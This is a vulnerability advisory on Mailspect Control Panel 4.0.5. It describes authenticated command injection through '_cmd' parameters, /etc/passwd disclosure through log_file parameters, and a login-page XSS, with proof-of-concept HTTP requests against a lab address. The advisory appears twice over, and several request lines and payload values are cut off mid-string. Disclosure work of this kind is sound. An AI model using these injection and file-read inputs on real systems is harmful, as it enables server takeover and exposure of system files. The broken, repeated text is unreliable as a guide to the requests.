Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
Release Date:
===========
June 21, 2014
Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently,
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in
content filers and reputation engines.
Abstract Advisory Information:
=======================
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel
4.0.5 web application.
Vulnerability Disclosure Timeline:
=========================
May 4, 2014 : Contact with Vendor
May 16, 2014 : Vendor Response
June 21, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected.
Exploitation Technique:
==================
RCE: Remote, Authenticated
AFR: Remote, Authenticated
XSS: Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to
"status_info.cgi?group=
Other parameters with the suffix "_cmd" are probably vulnerable.
2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary
file name like "/etc/passwd" will cause the file's content's disclosure.
3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"
will cause the file's content's disclosure.
4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads
the Javascript code's execution.
Proof of Concept (PoC):
==================
Proof of Concept RCE Request:
POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/
Cookie: u=
p=
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 1282
post=1&config_mppd_conf=%
2. Proof of Concept AFR Request 1:
GET /monitor_logs_ctl.cgi?log_
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/
Cookie: u=
p=
Connection: keep-alive
3. Proof of Concept AFR Request 2:
POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/
Cookie: u=
p=
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 85
group=default&post=1&log_file=
4. Proof of Concept XSS Request:
GET /login.cgi?login=abc%22%3E%
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Solution Fix & Patch:
================
XSS will be patched at version 4.0.7
There will be no patch for RCE and AFR vulnerabilities as stated at the vendor's reply.
Security Risk:
==========
The risk of the vulnerabilities above estimated as high.
Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAŞ
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr/advisories.html
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA Security
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
Release Date:
===========
June 21, 2014
Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently,
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in
content filers and reputation engines.
Abstract Advisory Information:
=======================
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel
4.0.5 web application.
Vulnerability Disclosure Timeline:
=========================
May 4, 2014 : Contact with Vendor
May 16, 2014 : Vendor Response
June 21, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected.
Exploitation Technique:
==================
RCE: Remote, Authenticated
AFR: Remote, Authenticated
XSS: Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to
"status_info.cgi?group=
Other parameters with the suffix "_cmd" are probably vulnerable.
2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary
file name like "/etc/passwd" will cause the file's content's disclosure.
3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"
will cause the file's content's disclosure.
4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads
the Javascript code's execution.
Proof of Concept (PoC):
==================
Proof of Concept RCE Request:
POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/
Cookie: u=
p=
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 1282
post=1&config_mppd_conf=%
2. Proof of Concept AFR Request 1:
GET /monitor_logs_ctl.cgi?log_
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/
Cookie: u=
p=
Connection: keep-alive
3. Proof of Concept AFR Request 2:
POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/
Cookie: u=
p=
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 85
group=default&post=1&log_file=
4. Proof of Concept XSS Request:
GET /login.cgi?login=abc%22%3E%
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Solution Fix & Patch:
================
XSS will be patched at version 4.0.7
There will be no patch for RCE and AFR vulnerabilities as stated at the vendor's reply.
Security Risk:
==========
The risk of the vulnerabilities above estimated as high.
Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAŞ
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr/advisories.html
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA Security